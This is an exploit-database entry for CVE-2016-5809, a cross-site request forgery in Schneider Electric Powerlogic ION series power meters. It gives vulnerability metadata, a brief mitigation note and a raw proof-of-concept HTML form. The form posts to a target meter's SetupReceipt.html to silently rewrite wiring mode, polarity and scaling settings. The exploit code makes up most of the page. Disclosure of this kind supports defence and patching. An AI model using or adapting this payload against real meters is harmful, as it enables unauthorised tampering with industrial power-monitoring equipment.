header-logo
Suggest Exploit
vendor:
Powerlogic IONXXXX Series
by:
t4rkd3vilz
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Powerlogic IONXXXX Series
Affected Version From: ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, PM5XXX series
Affected Version To: All versions
Patch Exists: NO
Related CWE: CVE-2016-5809
CPE: schneider-electric:powerlogic_ion_series
Metasploit:
Other Scripts:
Platforms Tested: All
2018

Powerlogic Schneider Electric IONXXXX Series – Cross-Site Request Forgery

This exploit allows an attacker to perform unauthorized actions on behalf of a victim user by tricking them into clicking a malicious link or visiting a website controlled by the attacker.

Mitigation:

To mitigate this vulnerability, it is recommended to implement CSRF protection mechanisms such as random CSRF tokens and checking the Referer header in requests.
Source

Exploit-DB raw data:

# Exploit Title: Powerlogic Schneider Electric IONXXXX Series - Cross-Site Request Forgery
# Date: 2018-05-17
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Version: ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, PM5XXX series.
# Tested on: All Version
# CVE : CVE-2016-5809

# PoC


<form name="frmConfig" action="http://TargetIp/SetupReceipt.html
<http://targetip/SetupReceipt.html>" method="post">
select name="PMLSel_0x7800">
<option selected="selected">9S - 4 Wire Wye/Delta</option>
<option>35S - 3 Wire</option>
<option>36S - 4 Wire Wye</option>
<option>DEMO</option>
</select>
<select name="PMLSel_0x7a4a">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7000" size="15" value="480.00"/>
<select name="PMLSel_0x7a4b">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7001" size="15" value="480.00"/>
<select name="PMLSel_0x7a4c">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7002" size="15" value="200.00"/>
<input type="text" name="PMLIFl_0x7003" size="15" value="5.00"/>
<select name="PMLSel_0x7801">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<select name="PMLSel_0x7802">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<select name="PMLSel_0x7803">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7004" size="15" value="5.00"/>
<select name="PMLSel_0x7a49">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7005" size="15" value="5.00"/>
<input type="text" name="PMLIFl_0x721a" size="15" value="0.00"/>
<input type="text" name="PMLIStr_0x1345" size="15" value="EPMAPS"/>
<input type="text" name="PMLIFl_0x70b4" size="15" value="900.00"/>
<input type="text" name="PMLIStr_0x1346" size="15" value="POZO SAN"/>
<input type="text" name="PMLIFl_0x70c4" size="15" value="1.00"/>
<input type="text" name="PMLIStr_0x1347" size="15" value="ANTONIO PICHIN."/>
<input type="text" name="PMLIFl_0x70d4" size="15" value="70.00"/>
<input type="submit" class="btn" value="Save" name="Submit22" />
</form>

Navigation

Suggest Exploit

Services By CQR